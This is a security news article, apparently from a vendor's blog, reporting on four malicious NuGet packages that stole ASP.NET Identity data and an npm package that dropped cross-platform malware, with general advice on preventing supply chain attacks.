Malicious NuGet Packages Stole ASP.NET Data

Malicious NuGet Packages Stole ASP.NET Data

Malicious NuGet Packages Stole ASP.NET Data in a recent supply chain attack. Researchers discovered four harmful packages targeting developers. These packages aimed at ASP.NET web application projects. However, the real goal was to compromise deployed applications.

A security report revealed that the campaign stole ASP.NET Identity data. For example, attackers collected user accounts and role assignments. They also gathered permission mappings from applications. Therefore, they gained deep control over access systems.

The affected packages included NCryptYo, DOMOAuth2_, IRAOAuth2.0, and SimpleWriter_. They appeared legitimate at first glance. However, they contained hidden malicious functions. Before removal, they recorded over 4,500 downloads.

Multi-Stage Attack Through NuGet Packages

NCryptYo acted as the first-stage dropper. When developers loaded it, the package activated automatically. It installed hidden hooks inside the runtime environment. Therefore, it decrypted and deployed a second-stage payload.

This payload created a local proxy server. The proxy relayed traffic to an attacker-controlled command server. Moreover, the server address changed dynamically at runtime. As a result, detection became more difficult.

After the proxy started, the other packages activated. DOMOAuth2_ and IRAOAuth2.0 transmitted Identity data through the proxy. Meanwhile, the command server responded with altered authorization rules. Therefore, attackers modified access controls remotely.

Backdoors and Persistent Control

The malicious server sent instructions to grant admin privileges. For example, it could assign new roles to attacker-controlled accounts. It could also disable certain security checks. Therefore, it created persistent backdoors inside applications.

SimpleWriter_ added more risk. It allowed unconditional file writing on the system. In addition, it executed hidden processes without user awareness. Although it claimed to offer PDF features, it performed malicious tasks.

Researchers noted that the campaign targeted applications, not developer machines. However, compromised dependencies infected production systems after deployment. Therefore, attackers gained access to live environments.

npm Package Dropped Cross-Platform Malware

In a related case, a malicious npm package named ambar-src infected developers. It gathered over 50,000 downloads before removal. The package used npm’s preinstall script to run malicious code automatically.

On Windows systems, it downloaded an executable file. That file decrypted shellcode in memory. On Linux, it executed a bash script that installed a reverse shell. On macOS, it deployed a JXA agent linked to the Mythic framework.

The malware performed reconnaissance and stole browser data. It also captured system passwords using fake prompts. After collecting information, it sent data to a cloud-hosted domain. Therefore, it blended traffic with trusted services. Experts warned that infected systems must be considered fully compromised. Removing the package alone may not solve the issue. Attackers could retain hidden access.

How to Prevent Supply Chain Attacks

Developers must review third-party packages carefully before installation. For example, they should verify publishers and check unusual behaviors. In addition, teams should monitor outbound traffic for unknown connections. Therefore, they can detect hidden proxies or data exfiltration early.

Organizations can deploy managed detection and response services. These services analyze suspicious runtime activity in real time. Furthermore, regular vulnerability assessments help identify risky dependencies in development pipelines. By combining dependency scanning and continuous monitoring, companies can reduce the risk of malicious NuGet and npm packages.

Sleep well, we got you covered.